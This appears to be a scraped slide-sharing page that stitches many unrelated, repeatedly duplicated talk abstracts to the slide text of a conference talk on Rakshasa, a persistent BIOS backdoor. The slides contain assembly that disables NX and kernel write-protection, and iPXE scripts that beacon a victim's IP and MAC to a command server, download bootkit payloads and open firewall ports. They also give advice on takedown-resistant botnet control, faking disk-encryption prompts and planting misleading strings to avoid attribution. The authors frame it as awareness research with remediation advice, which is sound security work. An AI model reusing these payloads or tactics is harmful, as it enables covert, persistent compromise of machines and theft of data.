This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities. It is hoped to raise awareness of the security community regarding the dangers associated with non open source firmwares shipped with any computer and question their integrity. This shall also result in upgrading the best practices for forensics and post intrusion analysis by including the afore mentioned firmwares as part of their scope of work.
PostgreSQL is a very popular and feature-rich DBMS. At the same time, PostgreSQL has a set of annoying wicked problems, which haven't been resolved in decades. Miraculously, with just a small patch to PostgreSQL core extending this API, it appears possible to solve wicked PostgreSQL problems in a new engine made within an extension.
eBPF (extended Berkeley Packet Filters) is a modern kernel technology that can be used to introduce dynamic tracing into a system that wasn't prepared or instrumented in any way. The tracing programs run in the kernel, are guaranteed to never crash or hang your system, and can probe every module and function -- from the kernel to user-space frameworks such as Node and Ruby.
In this workshop, you will experiment with Linux dynamic tracing first-hand. First, you will explore BCC, the BPF Compiler Collection, which is a set of tools and libraries for dynamic tracing. Many of your tracing needs will be answered by BCC, and you will experiment with memory leak analysis, generic function tracing, kernel tracepoints, static tracepoints in user-space programs, and the "baked" tools for file I/O, network, and CPU analysis. You'll be able to choose between working on a set of hands-on labs prepared by the instructors, or trying the tools out on your own test system.
Next, you will hack on some of the bleeding edge tools in the BCC toolkit, and build a couple of simple tools of your own. You'll be able to pick from a curated list of GitHub issues for the BCC project, a set of hands-on labs with known "school solutions", and an open-ended list of problems that need tools for effective analysis. At the end of this workshop, you will be equipped with a toolbox for diagnosing issues in the field, as well as a framework for building your own tools when the generic ones do not suffice.
PostgreSQL is a very popular and feature-rich DBMS. At the same time, PostgreSQL has a set of annoying wicked problems, which haven't been resolved in decades. Miraculously, with just a small patch to PostgreSQL core extending this API, it appears possible to solve wicked PostgreSQL problems in a new engine made within an extension.
eBPF (extended Berkeley Packet Filters) is a modern kernel technology that can be used to introduce dynamic tracing into a system that wasn't prepared or instrumented in any way. The tracing programs run in the kernel, are guaranteed to never crash or hang your system, and can probe every module and function -- from the kernel to user-space frameworks such as Node and Ruby.
In this workshop, you will experiment with Linux dynamic tracing first-hand. First, you will explore BCC, the BPF Compiler Collection, which is a set of tools and libraries for dynamic tracing. Many of your tracing needs will be answered by BCC, and you will experiment with memory leak analysis, generic function tracing, kernel tracepoints, static tracepoints in user-space programs, and the "baked" tools for file I/O, network, and CPU analysis. You'll be able to choose between working on a set of hands-on labs prepared by the instructors, or trying the tools out on your own test system.
Next, you will hack on some of the bleeding edge tools in the BCC toolkit, and build a couple of simple tools of your own. You'll be able to pick from a curated list of GitHub issues for the BCC project, a set of hands-on labs with known "school solutions", and an open-ended list of problems that need tools for effective analysis. At the end of this workshop, you will be equipped with a toolbox for diagnosing issues in the field, as well as a framework for building your own tools when the generic ones do not suffice.
Using the new extended Berkley Packet Filter capabilities in Linux to the improve performance of auditing security relevant kernel events around network, file and process actions.
DTrace and SystemTap are dynamic tracing frameworks available for Solaris and Linux respectively. This session will give an overview of the static DTrace probes available in both Drizzle and MySQL and show numerous examples of scripts that utilize these probes. Mixing dynamic and static probes will also be discussed.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux for to Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that have been written in the past 12 months for performance analysis that use BPF. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funcccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
Accelerated Linux Core Dump Analysis training public slidesDmitry Vostokov
The slides from Software Diagnostics Services Linux core dump analysis training. The training description: "Learn how to analyse Linux process crashes and hangs, navigate through process core memory dump space and diagnose corruption, memory leaks, CPU spikes, blocked threads, deadlocks, wait chains, and much more. This book uses a unique and innovative pattern-oriented diagnostic analysis approach to speed up the learning curve. The training consists of 13 practical step-by-step exercises using GDB debugger highlighting more than 25 memory analysis patterns diagnosed in 64-bit process core memory dumps. The training also includes source code of modelling applications, a catalogue of relevant patterns from Software Diagnostics Institute, and an overview of relevant similarities and differences between Windows and Linux user space memory dump analysis useful for engineers with Wintel background."
Moved to https://speakerdeck.com/ebiken/zebra-srv6-cli-on-linux-dataplane-enog-number-49
Introduction to SRv6, Linux SRv6 implementation and how to add SRv6 CLI to Zebra 2.0 Open Source Network Operation Stack.
Presented at ENOG (Echigo NOG) #49.
From KubeCon to ContainerDays, eBPF is trendy in the Cloud Native world. What is eBPF, and why is it revolutionary, and what can it bring to you specifically?
Through concrete examples applied to observability, networking, and security, this talk will explain the principles of eBPF and its concrete advantages to connect and secure Cloud Native applications.
This talk will explain what is eBPF, why it is revolutionary is several fields, give examples of tools using eBPF and what they gain from it, and open up to the future of that technology.
Hardware backdooring is practical : slidesMoabi.com
This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities. It is hoped to raise awareness of the security community regarding the dangers associated with non open source firmwares shipped with any computer and question their integrity. This shall also result in upgrading the best practices for forensics and post intrusion analysis by including the afore mentioned firmwares as part of their scope of work.
Using the new extended Berkley Packet Filter capabilities in Linux to the improve performance of auditing security relevant kernel events around network, file and process actions.
DTrace and SystemTap are dynamic tracing frameworks available for Solaris and Linux respectively. This session will give an overview of the static DTrace probes available in both Drizzle and MySQL and show numerous examples of scripts that utilize these probes. Mixing dynamic and static probes will also be discussed.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux for to Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that have been written in the past 12 months for performance analysis that use BPF. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funcccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
Accelerated Linux Core Dump Analysis training public slidesDmitry Vostokov
The slides from Software Diagnostics Services Linux core dump analysis training. The training description: "Learn how to analyse Linux process crashes and hangs, navigate through process core memory dump space and diagnose corruption, memory leaks, CPU spikes, blocked threads, deadlocks, wait chains, and much more. This book uses a unique and innovative pattern-oriented diagnostic analysis approach to speed up the learning curve. The training consists of 13 practical step-by-step exercises using GDB debugger highlighting more than 25 memory analysis patterns diagnosed in 64-bit process core memory dumps. The training also includes source code of modelling applications, a catalogue of relevant patterns from Software Diagnostics Institute, and an overview of relevant similarities and differences between Windows and Linux user space memory dump analysis useful for engineers with Wintel background."
Moved to https://speakerdeck.com/ebiken/zebra-srv6-cli-on-linux-dataplane-enog-number-49
Introduction to SRv6, Linux SRv6 implementation and how to add SRv6 CLI to Zebra 2.0 Open Source Network Operation Stack.
Presented at ENOG (Echigo NOG) #49.
From KubeCon to ContainerDays, eBPF is trendy in the Cloud Native world. What is eBPF, and why is it revolutionary, and what can it bring to you specifically?
Through concrete examples applied to observability, networking, and security, this talk will explain the principles of eBPF and its concrete advantages to connect and secure Cloud Native applications.
This talk will explain what is eBPF, why it is revolutionary is several fields, give examples of tools using eBPF and what they gain from it, and open up to the future of that technology.
Hardware backdooring is practical : slidesMoabi.com
This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities. It is hoped to raise awareness of the security community regarding the dangers associated with non open source firmwares shipped with any computer and question their integrity. This shall also result in upgrading the best practices for forensics and post intrusion analysis by including the afore mentioned firmwares as part of their scope of work.
Docker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQJérôme Petazzoni
Docker is the Open Source container engine. This is an introduction to Docker, what it is, how it works, and some material presenting the new features in versions 0.8 and 0.9.
This presentations introduces some common protocols used in electronics, and how to sniff/speak them. Then a bit about USB, and some interesting hacks with these things.
Then a bit about openwrt and router hacking.
About the author: Priya Autee is software engineer at Intel working on various leading edge IA features and Intel(R) RDT expert. She is focused on prototyping and researching open source APIs like DPDK, Intel(R) RDT etc. to support NFV/compute sensitive requirements on Intel Architecture. She holds Masters in Computer Science from Arizona State University, Arizona.
Let Me Pick Your Brain - Remote Forensics in Hardened EnvironmentsNicolas Collery
Full Disk Encryption (FDE) may be rather useful as a defense mechanism against potential theft of a computer system. Usually such protections comes with some levels of hardening like removing administrative rights. However, when the system is compromised and requires careful forensic analysis, FDE and hardening can be quite painful to forensic analysts. This presentation delivered at IIC-SG-2018 (Infosec In the City - Singapore) and at Div0 (Division0 local security meetup) highlights few techniques to let a remote analyst perform investigations.
https://www.infosec-city.com
https://www.meetup.com/div-zero/
The Raspberry Pi is an inexpensive ($35), credit card sized computer that is able to run the Linux operating system. The card also contains USB ports, an Ethernet port, camera port, GPIO lines, serial ports, SPI port, HDMI port, and I2C port – just about anything you would want for an inexpensive and very powerful robot controller! Lloyd Moore will show us how to get started with this device. Specifically we'll talk about loading and configuring the operating system, installing the Qt (C++) development system, and controlling some of the ports.
The respective talk was held by Oleksandr Shevchenko (Senior Engineering Consultant, GlobalLogic) at GlobalLogic Lviv Embedded TechTalk #2 on May 23, 2018.
Oleksandr presentation is about features of software architecture, which provides parallel work of Linux and operating system real-time on different cores of a single processor. The talk is also about the Linux mechanism, which allows to connect the processor cores after the boot process has finished, the so-called "CPU Hotplug".
[Defcon24] Introduction to the Witchcraft Compiler CollectionMoabi.com
With this presentation, we take a new approach to reverse engineering. Instead of attempting to decompile code, we seek to undo the work of the linker and produce relocatable files, the typical output of a compiler. The main benefit of the later technique over the former being that it does work. Once achieved universal code ‘reuse’ by relinking those relocatable objects as arbitrary shared libraries, we'll create a form of binary reflection, add scripting capabilities and in memory debugging using a JIT compiler, to attain automated API prototyping and annotation, which, we will argue, constitutes a primary form of binary code self awareness. Finally, we'll see how abusing the dynamic linker internals shall elegantly solve a number of complex tasks for us, such as calling a given function within a binary without having to craft a valid input to reach it.
The applications in terms of vulnerability exploitation, functional testing, static analysis validation and more generally computer wizardry being tremendous, we'll have fun demoing some new exploits in real life applications, and commit public program profanity, such as turning PEs into ELFs, functional scripting of sshd in memory, stealing crypto routines without even disassembling them, among other things that were never supposed to work. All the above techniques have been implemented into the Wichcraft Compiler Collection, to be released as proper open source software (MIT/BSD-2 licenses) exclusively at DEF CON 24.
Jonathan Brossard is a computer whisperer from France, although he's been living in Brazil, India, Australia and now lives in San Francisco. For his first conference at DEF CON 16, he hacked Microsoft Bitlocker, McAffee Endpoint and a fair number of BIOS Firmwares. During his second presentation at DEF CON 20, he presented Rakshasa, a BIOS malware based on open source software, the MIT Technology review labeled "incurable and undetectable".
This year will be his third DEF CON ... Endrazine is also known in the community for having run the Hackito Ergo Sum and NoSuchCon conferences in France, participating to the Shakacon Program Committee in Hawaii, and authoring a number of exploits over the past decade. Including the first remote Windows 10 exploit and several hardcore reverse engineering tools and whitepapers. Jonathan is part of the team behind MOABI.COM, and acts as the Principal Engineer of Product Security at Salesforce.
Twitter: @endrazine
Facebook: toucansystem
https://moabi.com
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES...Moabi.com
Powerpoint of our presentation at Blackhat 2015.
Featuring the first attacks against Windows 10 and Microsoft Edge.
- French Kiss attack against Windows 10.
- Syphilis attack against Microsoft Edge.
- Ménage à trois attack against Windows 10 and Exchange.
- Démos on Amazon AWS and Microsoft Azure.
This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities. It is hoped to raise awareness of the security community regarding the dangers associated with non open source firmwares shipped with any computer and question their integrity. This shall also result in upgrading the best practices for forensics and post intrusion analysis by including the afore mentioned firmwares as part of their scope of work.
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese...Moabi.com
This presentation given in 2011 during the first Ruxcon Monthly (Ruxmon) Sydney focuses on proprietary protocols reverse engineering and vulnerability audits.
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...Moabi.com
Pre-boot authentication software, in particular full hard disk encryption software, play a key role in preventing information theft. In this paper, we present a new class of vulnerability affecting multiple high value pre-boot authentication software, including the latest Microsoft disk encryption technology : Microsoft Vista's Bitlocker, with TPM chip enabled. Because Pre-boot authentication software programmers commonly make wrong assumptions about the inner workings of the BIOS interruptions responsible for handling keyboard input, they typically use the BIOS API without flushing or initializing the BIOS internal keyboard buffer. Therefore, any user input including plain text passwords remains in memory at a given physical location. In this article, we first present a detailed analysis of this new class of vulnerability and generic exploits for Windows and Unix platforms under x86 architectures. Unlike current academic research aiming at extracting information from the RAM, our practical methodology does not require any physical access to the computer to extract plain text passwords from the physical memory. In a second part, we will present how this information leakage combined with usage of the BIOS API without careful initialization of the BIOS keyboard buffer can lead to computer reboot without console access and full security bypass of the pre-boot authentication pin if an attacker has enough privileges to modify the bootloader. Other related work include information leakage from CPU caches, reading physical memory thanks to firewire and switching CPU modes.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
With each of the past 3 Ruby releases, YJIT has delivered higher and higher performance. However, we are seeing diminishing returns, because as JIT-compiled code becomes faster, it makes up less and less of the total execution time, which is now becoming dominated by C function calls. As such, it may appear like there is a fundamental limit to Ruby’s performance.
In the first half of the 20th century, some early airplane designers thought that the speed of sound was a fundamental limit on the speed reachable by airplanes, thus coining the term “sound barrier”. This limit was eventually overcome, as it became understood that airflow behaves differently at supersonic speeds.
In order to break the Ruby performance barrier, it will be necessary to reduce the dependency on C extensions, and start writing more gems in pure Ruby code. In this talk, I want to look at this problem more in depth, and explore how YJIT can help enable writing pure-Ruby software that delivers high performance levels.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
2. DISCLAIMER
We are not « terrorists ». We won't release our PoC
backdoor.
The x86 architecture is plagued by legacy.
Governments know. The rest of the industry : not so
much.
There is a need to discuss the problems in
order to find solutions...
This is belived to be order of
magnitudes better over existing
backdoors/malware
3. Agenda
Motivation : state level backdooring ?
Coreboot & x86 architecture
State of the art in rootkitting, romkitting
Introducing Rakshasa
Rakshasa design
Why cryptography (Truecrypt/Bitlocker/TPM)
won't save us...
Backdooring like a nation state
4. Who am I ?
- Security researcher, pentester
- First learned asm (~15 years ago)
- Presented at Blackhat/Defcon/CCC/HITB...
- Master in Engineering, master in Computer Sciences
- Co organiser of the Hackito Ergo Sum conference (Paris)
Likes : Unix, network, architecture, low level, finding 0days (mem
corruptions).
Dislikes : web apps, canned exploits.
- Super pure English accent (French, learned English in India, lives in
Australia... ;))
17. Rakshasa : Design (1/2)
Core components :
- Coreboot
- SeaBios
- iPXE
- payloads
Built on top of free software : portability, non
attribution, cheap dev (~4 weeks of work), really really
really hard to detect as malicious.
Supports 230 motherboards.
18. Rakshasa : Design (2/2)
Flash the BIOS (Coreboot + PCI roms such as iPXE)
Flash the network card or any other PCI device
(redundancy)
Boot a payload over the network (bootkit over https)
→ Boot a payload over wifi/wimax (breach the network
perimeter, bypasses network detection, I(P|D)S )
→ Remotely reflash the BIOS/network card if
necessary
21. Rakshasa : embedded features
Remove NX bit → executable heap/stack.
Make every mapping +W in ring0
Remove CPU updates (microcodes)
Remove anti-SMM protections → generic local root exploit
Disable ASLR
Bootkitting (modified Kon-boot payload*)
* Thanks to Piotr Bania for his contribution to
Rakshasa :)
22. Rakshasa : removing the NX bit (1/2)
MSR !!! Model Specific Register
AMD64 Architecture Programmer's manual (volume 2,
Section 3.1.7 : Extended Feature Enable Register) :
No-Execute Enable (NXE) Bit. Bit 11, read/write. Setting
this bit to 1 enables the no-execute page-
protection feature. The feature is disabled when this bit is
cleared to 0.
23. Rakshasa : removing the NX bit (2/2)
; Disable NX bit (if supported)
mov eax,0x80000000 ; get higher function supported by eax
cpuid ; need amd K6 or better (anything >= 1997... should be ok)
cmp eax,0x80000001
jb not_supported ; need at least function 0x80000001
mov eax,0x80000001 ; get Processor Info and Feature Bits
cpuid
bt edx,20 ; NX bit is supported ?
jnc not_supported
mov ecx, 0xc0000080 ; extended feature register (EFER)
rdmsr ; read MSR
btr eax, 11 ; disable NX (EFER_NX) // btr = bit test and reset
wrmsr ; write MSR
not_supported:
24. Make every mapping +W in ring0
Intel Manuals (Volume 3A, Section 2.5):
Write Protect (bit 16 of CR0) - When set, inhibits supervisor-
level procedures from writing into read-only pages; when clear,
allows supervisor-level procedures to write into read-only pages
(regardless of the U/S bit setting; see Section 4.1.3 and Section
4.6). This flag facilitates implementation of the copy-on-write
method of creating a new process (forking) used by operating
systems such as UNIX.
25. Make every mapping +W in ring0
(32b/64b)
; 32b version :
mov eax,cr0
and eax,0xfffeffff
mov cr0,eax
; 64b version :
mov rax,cr0
and rax,0xfffeffff
mov cr0,rax
27. Remove anti-SMM protections (1/2)
Intel® 82845G/82845GL/82845GV Graphics and Memory Controller datasheets, Section 3.5.1.22: SMRAM—System
Management RAM Control Register (Device 0), bit 4 :
SMM Space Locked (D_LCK)—R/W, L. When D_LCK is set to 1, D_OPEN is reset to 0; D_LCK,
D_OPEN, C_BASE_SEG, H_SMRAM_EN, TSEG_SZ and TSEG_EN become read only. D_LCK
can be set to 1 via a normal configuration space write but can only be cleared by a Full Reset. The
combination of D_LCK and D_OPEN provide convenience with security. The BIOS can use the
D_OPEN function to initialize SMM space and then use D_LCK to “lock down” SMM space in the
future so that no application software (or BIOS itself) can violate the integrity of SMM space, even if
the program has knowledge of the D_OPEN function.
28. Remove anti-SMM protections (2/2)
D_LCK is not supported by CoreBoot currently anyway...
; disable D_LCK shellcode for Coreboot...
nop
29. Disable ASLR
- OS dependant.
- Seed for full ASLR has to be in kernel land
(equivalent of execve()).
→ patch the seed with a known value
- Seed location for Windows 7 identified by Kumar
& Kumar (HITB KL 2010).
→ Mapping is 100% repeatable :)
30. Rakshasa : embedded features :
conclusion
→ Permantent lowering of the security level on any OS.
→ Welcome back to the security level of 1997.
→ Persistant, even if HD or OS is remove/restored.
31. Rakshasa : remote payload
Currently capable of Bootkitting any version of
Windows (32b/64b) thanks to special version of
Kon-boot
Bootkit future Oses ? → Update/remove/reflash
firmwares (PCI, BIOS)
32. Rakshasa : stealthness
We don't touch the disk. 0 evidence on the filesystem.
The code flashed to motherboard is not hostile per si
(there is one text file with urls in it.. that's it).
We can remotely boot from an alternate payload or
even OS : fake Truecrypt/Bitlocker prompt !
Optionally boot from a WIFI/WMAX stack : 0 network
evidence on the LAN.
Fake BIOS menus if necessary. We use an embedded
CMOS image. We can use the real CMOS nvram to
store encryption keys/backdoor states between
reboots.
33. Rakshasa : why using Coreboot/SeaBios/iPXE is
the good approach
Portability : benefit from all the gory reverse
engineering work already done !
Awesome modularity : embbed existing payloads (as
floppy or cdrom images) and PCI roms directly in the
main Coreboot rom !
Eg : bruteforce bootloaders (Brossard, H2HC 2010),
bootkits without modification.
Network stacks : ip/udp/tcp, dns, http(s), tftp, ftp...
make your own (tcp over dns? Over ntp ?)
Code is legit : can't be flagged as malware !
34. Exemple iPXE configuration files :
get an IP
#!ipxe
# try dhcp first, else use static IP
dhcp || ( set net0/ip 192.168.0.3 && set
net0/netmask 255.255.255.0 && set
net0/gateway 192.168.0.1)
35. Exemple iPXE configuration files :
fun with webapps...
# evil pingback to C & C internet blog with HTTP auth...
kernel http://admin:p4ssw0rd@2012.hackitoergosum.org/xmlrpc.php?ip=$
{net0/ip}&mac=${net0/mac}&netmask=${net0/netmask}&gateway=$
{net0/gateway}&dns=${net0/dns}&domain=${net0/domain} ||
# Send an email using open relay web application
kernel http://vulnerablehost.com/vulnservice.asp?mail-from=Rakshasa&mail-
toaddress=endrazine%40gmail.com&mail-subject=BIOS%20Owned ||
# Rooter pharming : modify firewall settings
kernel http://admin:password@2012.hackitoergosum.org/cgi-bin/firewall?
action=enable&port=all ||
kernel http://root:root@2012.hackitoergosum.org/cgi-bin/firewall?enableport=all ||
36. Exemple iPXE configuration files :
chain configuration loader from the
web
#chain loader over https
chain https://www.pmcma.org/ads/love.jpg?ip=$
{net0/ip}&mac=${net0/mac} ||
37. Exemple iPXE configuration files :
boot an alternate OS/bootkit
# discard everything done so far
imgfree
# fetch memdisk kernel over the internet via ftp
kernel ftp://ftp.pmcma.org/pwnage/memdisk.pdf ||
# fetch bootkit payload over the internet via http
initrd http://www.pmcma.org/wp-content/uploads/2012/07/bootkit.pdf ||
# boot
boot
38. DEMO : Evil remote carnal pwnage
(of death)
I can write blogs too... Muhahahaha...
41. How to properly build a botnet ?
HTTPS + assymetric cryptography (client side certificates,
signed updates)
If Microsoft can do secure remote updates, so can a
malware !
Avoid DNS take overs by law enforcement agencies by
directing the C&C rotatively on innocent web sites (are you
gonna shut down Google.com?), use assymetric crypto to
push updates.
So you own my C&C for 1hour ? You can't do anything
with it !!
→ C&C CAN'T BE SHUT DOWN OR TAKEN OVER.
43. Why crypto won't save you (1/2)
We can fake the bootking/password prompt by
booting a remote OS (Truecrypt/Bitlocker)
Once we know the password, the BIOS
backdoor can emulate keyboard typing in 16b
real mode by programming the
keyboard/motherboard PIC microcontrolers
(Brossard, Defcon 2008)
If necessary, patch back original
BIOS/firmwares remotely.
44. Why crypto won't save you (2/2)
TPM + full disk encryption won't save you either :
1) It's a passive chip : if the backdoor doesn't
want explicit access to data on the HD, it can
simply ignore TPM.
2) Your HD is never encrypted when delivered
to you. You seal the TPM when you encrypt
your HD only. So TPM doesn't prevent
backdooring from anyone in the supply chain.
45. How about Avs ??
Putting an AV on a server to protect against
unknown threats is purely cosmetic.
You may as well put lipstick on your servers...
54. Remediation (leads)
Flash any firmware uppon reception of new hardware with
open source software you can verify.
Perform checksums of all firmwares by physically
extracting them (FPGA..) : costly !
Verify the integrity of all firmwares from time to time
Update forensics best practices :
1) Include firmwares in SoW
2) Throw away your computer in case of intrusion
Even then... not entirely satisfying : the backdoor can flash
the original firmwares back remotely.
55. Post intrusion recovery
- You can't trust your BIOS
→ you can't flash from the OS or even
floppy/cdrom.
→ need physical flasher.
- Rakshasa can reinfect itself from any PCI
expension ROM.
→ you need to flash all the firmwares of the
motherboards at the same time.
58. Side note on remote flashing
BIOS flashing isn't a problem : the flasher
(Linux based) is universal.
PCI roms flashing is more of a problem : flasher
is vendor dependant.
How to solve this issue... ?
59. Detecting network card
manufacturer from the remote C&C
IPXE allows scripting. Eg : sending the MAC
address as an URL parameter.
From the MAC, get the OUI number serverside.
From the OUI number, deduce manufacturer
Send the proper flashing tool as an embedded
OS to the backdoor...
61. Backdooring like a nation state
Rule #1 : non attribution
- you didn't write the free software in first place.
- add a few misleading strings, eg : in mandarin ;)
Rule #2 : plausible deniability
- use a bootstrap known remote vulnerability in a
network card firmware
(eg : Duflot's CVE-2010-0104)
